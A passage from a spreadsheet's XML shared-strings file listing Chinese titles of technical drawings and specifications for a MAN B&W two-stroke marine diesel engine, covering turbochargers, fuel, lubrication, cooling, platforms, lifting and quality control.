    <t xml:space="preserve">测量转换器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力计列表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">发电机转向错误报警                                         </t>
  </si>
  <si>
    <t xml:space="preserve">转向错误报警系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">注油器工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">转向错误报警表                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油泵安装说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油泵备件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油伺服系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">低温冷却系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">高温冷却系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油/燃气安装图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器旁通技术数据                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压器技术数据                                           </t>
  </si>
  <si>
    <t xml:space="preserve">除了B&amp;W的涡轮增压器                                       </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器/空冷器单元                                       </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器订货单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器进口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">气总管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排放&amp;噪音要求                                           </t>
  </si>
  <si>
    <t xml:space="preserve">鼓风机性能曲线                                           </t>
  </si>
  <si>
    <t xml:space="preserve">辅助鼓风机容量                                           </t>
  </si>
  <si>
    <t xml:space="preserve">辅助鼓风电动机马达                                         </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器喷嘴管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴管拉杆                                             </t>
  </si>
  <si>
    <t xml:space="preserve">拉杆横档                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器维修+堵转工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀接伸工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器化学清洗和蒸发                                        </t>
  </si>
  <si>
    <t xml:space="preserve">文字：增压器维修堵转                                        </t>
  </si>
  <si>
    <t xml:space="preserve">文字：空冷器维修                                          </t>
  </si>
  <si>
    <t xml:space="preserve">文字：空冷器清洗                                          </t>
  </si>
  <si>
    <t xml:space="preserve">文字：辅助鼓风机系统                                        </t>
  </si>
  <si>
    <t xml:space="preserve">后端格栅支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">托架支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧上层顶部支撑                                         </t>
  </si>
  <si>
    <t xml:space="preserve">螺钉截面                                              </t>
  </si>
  <si>
    <t xml:space="preserve">后空冷器体焊接                                           </t>
  </si>
  <si>
    <t xml:space="preserve">链箱处梯子                                             </t>
  </si>
  <si>
    <t xml:space="preserve">平台截面                                              </t>
  </si>
  <si>
    <t xml:space="preserve">走台布置更改                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀箱                                                </t>
  </si>
  <si>
    <t xml:space="preserve">扶梯                                                </t>
  </si>
  <si>
    <t xml:space="preserve">梯子装布置图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器座板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧下层支架安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧上层平台布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧中层平台布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧下层平台安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧俯视图/端视图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">上层走台外型                                            </t>
  </si>
  <si>
    <t xml:space="preserve">下层走台外型                                            </t>
  </si>
  <si>
    <t xml:space="preserve">走台外形图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">RENK发电机支架布置                                       </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧上层走台支架                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧中层走台支架                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧下层走台支架                                         </t>
  </si>
  <si>
    <t xml:space="preserve">底座顶视图（草图）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">走台支架布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">平台尺寸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">走台安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带扶手的走台支架框架                                        </t>
  </si>
  <si>
    <t xml:space="preserve">带栏杆的走台                                            </t>
  </si>
  <si>
    <t xml:space="preserve">等径三通接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊接短管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">塞子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">有槽无头螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">白合金钢推力轴承质量检查                                      </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承报警                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推力块座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">罩壳                                                </t>
  </si>
  <si>
    <t xml:space="preserve">液压联轴节                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油出口过滤器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泄放出口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油进油管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">后控制侧管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管系进-出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">法兰清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机外形图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机连接管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧主管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油总管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油系统变更                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油高速搅拌器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油高压双层管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泄放总管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油伞形密封回油总管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">燃油/排气控制阀泄放                                        </t>
  </si>
  <si>
    <t xml:space="preserve">高压管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内部泄放箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油旁通管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">支管布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机进排放箱出口                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油出口过滤泵保护                                         </t>
  </si>
  <si>
    <t xml:space="preserve">电缆软管安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">总管装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸截面总管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封油总管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">自紧法列表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油系统，轻油                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油系统，柴油                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主/辅重油燃油系统                                         </t>
  </si>
  <si>
    <t xml:space="preserve">双燃料系统                                             </t>
  </si>
  <si>
    <t xml:space="preserve">重油运行                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主机内部燃油系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油预热图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油透气箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器应急滑油柜                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管布置图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泄放系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制空气管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">高压油管切削具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">切削工具座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管铣削工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">系统进口油                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑/冷却油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴滑油管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">底层走台主管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸滑油总管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧走台管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧下层走台管系                                         </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴滑油总管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">填料函+机座泄放管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油分配器管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座泄放总管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">内压力                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机架操纵侧管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">填料函排放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴润滑油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱透气管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气空间泄放管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">放泄管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管主管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧顶层走台管系                                         </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器润滑油管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油过滤器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油补偿器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力补偿管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液压缸单元                                             </t>
  </si>
  <si>
    <t xml:space="preserve">到泵单元软管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵进口滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵出口滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷舞管布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推力端滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管出口泵                                           </t>
  </si>
  <si>
    <t xml:space="preserve">前端润滑油泵                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器进口热动阀出口                                        </t>
  </si>
  <si>
    <t xml:space="preserve">过滤器出口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油泵                                              </t>
  </si>
  <si>
    <t xml:space="preserve">1/2寸.限制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">进口管分配器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">I  号滑油系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">手动泵润滑油截面管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">手动泵润滑油出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">手动泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滑油泵进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">PI21管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">P122管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主起动阀装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">安全罩总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制安全空气管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空气分配管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封空气管-排气阀                                         </t>
  </si>
  <si>
    <t xml:space="preserve">密封空气说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">节流孔板座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制空气管泄放阀                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空气控制装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起动控制空气管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洗管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空气弹簧管-排气阀                                         </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气管安装图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">压缩空气图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气支管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">前各种管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">后管系                                               </t>
  </si>
  <si>
    <t xml:space="preserve">淡水总管出口                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泄漏识别管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">MAN增压器淡水冷却管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">ABB增压器淡水冷却管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">MET增压器淡水冷却管                                       </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却管支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器空冷器清洗管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洗管（水）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">                                                  </t>
  </si>
  <si>
    <t xml:space="preserve">T型管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洁                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器清洗管孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">汽水分离器排水                                           </t>
  </si>
  <si>
    <t xml:space="preserve">汽水分离器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">汽水分离器安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">汽水分离器泄放管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">薄片剖面图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器冷却水管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">海水冷却管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">单增压器的海水冷却管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">双增压器的海水冷却管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">海水冷却水系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却水系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">中央冷却热系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水系统详细资料                                         </t>
  </si>
  <si>
    <t xml:space="preserve">主/辅海水冷却水系统                                        </t>
  </si>
  <si>
    <t xml:space="preserve">主/辅淡水冷却水系统                                        </t>
  </si>
  <si>
    <t xml:space="preserve">淡水系统预热器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主/辅中央冷却水系统                                        </t>
  </si>
  <si>
    <t xml:space="preserve">压力冷却系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器清洗系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水处理系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">水套冷却系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中央冷却系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水管安装表                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却出水管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">低温出水                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器冷却水进口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油冷却器冷却水出口                                       </t>
  </si>
  <si>
    <t xml:space="preserve">发电机海水出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水分配管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">离心泵进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空气冷却器低温进口                                         </t>
  </si>
  <si>
    <t xml:space="preserve">预热器出口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空气冷却器低温出口                                         </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器淡水出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水出口集管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴冷却水模数                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水出口柴油膜片阀进口                                       </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油系统清洁器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油系统过滤器清洁                                        </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油系统详细资料                                         </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴滑油系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴箱放气                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油系统清洗说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">填料函泄放清洗说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">填料函污油清洗系统                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油/冷却油分配器安装                                      </t>
  </si>
  <si>
    <t xml:space="preserve">主/辅润滑油系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑油系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气泄放系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">动力涡轮单元滑油系统                                        </t>
  </si>
  <si>
    <t xml:space="preserve">主滑油、凸轮轴润滑油系统                                      </t>
  </si>
  <si>
    <t xml:space="preserve">填料函泄放系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压控制油系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">烟总管一侧                                             </t>
  </si>
  <si>
    <t xml:space="preserve">烟总管内部拆卸                                           </t>
  </si>
  <si>
    <t xml:space="preserve">废气图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">端部螺栓液压拉伸器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">断流接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">基本计算工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连杆提升                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴提升                                             </t>
  </si>
  <si>
    <t xml:space="preserve">上截面中心提升                                           </t>
  </si>
  <si>
    <t xml:space="preserve">重心                                                </t>
  </si>
  <si>
    <t xml:space="preserve">机架总成提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">除曲轴外的机座提升                                         </t>
  </si>
  <si>
    <t xml:space="preserve">除曲轴外的机座后端提升                                       </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴和机座提升                                           </t>
  </si>
  <si>
    <t xml:space="preserve">集管提升                                              </t>
  </si>
  <si>
    <t xml:space="preserve">集管前端提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">集管中段提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">集管后端提升                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱提升                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">侧推力调整说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">起重机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元备件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴瓦拆卸工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管钳                                                </t>
  </si>
  <si>
    <t xml:space="preserve">工具板装配                                             </t>
  </si>
  <si>
    <t xml:space="preserve">903工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">907工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">911工具板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油底柜说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油底柜                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油出口详图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油位，整齐列表                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油单元外形                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管系统单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油单元电路图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴润滑油输出单元                                        </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴润滑油单元外形                                        </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴润滑油单元管系统                                       </t>
  </si>
  <si>
    <t xml:space="preserve">排放箱单元外观                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泄放管系统单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑油增压器布置                                        </t>
  </si>
  <si>
    <t xml:space="preserve">燃油混合单元外观                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑油促动泵                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油混合管系统单元                                         </t>
  </si>
  <si>
    <t xml:space="preserve">密封油泵单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">清洁说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">喷涂指导                                              </t>
  </si>
  <si>
    <t xml:space="preserve">测深图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">进口控制阀管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">清洗单元外形                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管感光系统单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却单元安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却管系统单元                                         </t>
  </si>
  <si>
    <t xml:space="preserve">废热利用装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">摩擦原料                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶撑数据                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机速度                                             </t>
  </si>
  <si>
    <t xml:space="preserve">顶撑布置图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">顶撑外形图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链接装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">分叉装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶撑力                                               </t>
  </si>
  <si>
    <t xml:space="preserve">顶撑拉紧数据                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶撑说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">振动极限                                              </t>
  </si>
  <si>
    <t xml:space="preserve">静态曲轴负荷                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压顶撑说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴对中模型                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压顶部减振器说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机最小要求空间                                         </t>
  </si>
  <si>
    <t xml:space="preserve">起重机所需机舱高度                                         </t>
  </si>
  <si>
    <t xml:space="preserve">标准起重机所需机舱高度                                       </t>
  </si>
  <si>
    <t xml:space="preserve">MAN-B&amp;W双起重机                                       </t>
  </si>
  <si>
    <t xml:space="preserve">机舱起重能力                                            </t>
  </si>
  <si>
    <t xml:space="preserve">检查设备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">辅助机械检查                                            </t>
  </si>
  <si>
    <t xml:space="preserve">2冲程柴油机检查                                          </t>
  </si>
  <si>
    <t xml:space="preserve">不确定船舶2冲程柴油机布置                                     </t>
  </si>
  <si>
    <t xml:space="preserve">油轮2冲程柴油机布置                                        </t>
  </si>
  <si>
    <t xml:space="preserve">散装船2冲程柴油机布置                                       </t>
  </si>
  <si>
    <t xml:space="preserve">装箱船2冲程柴油机布置集                                      </t>
  </si>
  <si>
    <t xml:space="preserve">滚装船2冲程柴油机布置                                       </t>
  </si>
  <si>
    <t xml:space="preserve">客轮2冲程柴油机布置                                        </t>
  </si>
  <si>
    <t xml:space="preserve">部件拆卸高度                                            </t>
  </si>
  <si>
    <t xml:space="preserve">客轮4冲程柴油机布置                                        </t>
  </si>
  <si>
    <t xml:space="preserve">其他船4冲程柴油机布置                                       </t>
  </si>
  <si>
    <t xml:space="preserve">燃油输出单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起重机检查工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">PTO辅助机械电子产品                                       </t>
  </si>
  <si>
    <t xml:space="preserve">其他辅助机械                                            </t>
  </si>
  <si>
    <t xml:space="preserve">TCS/PTI+PTO/PTI                                   </t>
  </si>
  <si>
    <t xml:space="preserve">消音器+排气系统（噪音)                                      </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器起重机梁                                         </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机制动马力选择                                         </t>
  </si>
  <si>
    <t xml:space="preserve">尺寸+重量研究                                           </t>
  </si>
  <si>
    <t xml:space="preserve">经济研究                                              </t>
  </si>
  <si>
    <t xml:space="preserve">蒸汽机/柴油机对照                                         </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机/柴油机对照                                         </t>
  </si>
  <si>
    <t xml:space="preserve">负荷图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">工作模型                                              </t>
  </si>
  <si>
    <t xml:space="preserve">用途研究                                              </t>
  </si>
  <si>
    <t xml:space="preserve">催化剂网反应器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">地脚螺钉装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机机座外观                                           </t>
  </si>
  <si>
    <t xml:space="preserve">树脂垫块剖面图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">环氧垫块计算                                            </t>
  </si>
  <si>
    <t xml:space="preserve">测量销的配置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">环氧垫块信息                                            </t>
  </si>
  <si>
    <t xml:space="preserve">各种柴油机机座                                           </t>
  </si>
  <si>
    <t xml:space="preserve">锲支撑安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">锲形垫片上平面机加工                                        </t>
  </si>
  <si>
    <t xml:space="preserve">侧面支撑板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴系对中数据                                            </t>
  </si>
  <si>
    <t xml:space="preserve">端部支撑板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">侧锲衬垫，左侧                                           </t>
  </si>
  <si>
    <t xml:space="preserve">支撑锲                                               </t>
  </si>
  <si>
    <t xml:space="preserve">支撑锲固定                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞生产规范                                            </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀生产规范                                           </t>
  </si>
  <si>
    <t xml:space="preserve">磨损缺陷                                              </t>
  </si>
  <si>
    <t xml:space="preserve">MC-S往复部件生产建议                                      </t>
  </si>
  <si>
    <t xml:space="preserve">首次认可通用质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">通用要求等级                                            </t>
  </si>
  <si>
    <t xml:space="preserve">B+W要求                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连杆质量规范                                            </t>
  </si>
  <si>
    <t xml:space="preserve">修理排气阀轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊接质量指标说明书                                         </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器焊接                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压排气阀执行器生产建议                                      </t>
  </si>
  <si>
    <t xml:space="preserve">超声波试验                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链传动上部工艺                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气口铣削工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">十字头滚压工艺                                           </t>
  </si>
  <si>
    <t xml:space="preserve">薄壁冷却水套生产建议                                        </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓工艺                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油泵齿轮工艺                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套标记说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱质量控制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器质量控制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱检查+作记号                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管检查+作记号                                         </t>
  </si>
  <si>
    <t xml:space="preserve">焊接排气集管质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">恒压转换程序                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架安装说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">废气增压空冷器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵机构安装说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵安装说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排烟管装配说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">运动件间隙检查                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架探伤要求                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓结头拧紧质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖盖质量规范                                           </t>
  </si>
  <si>
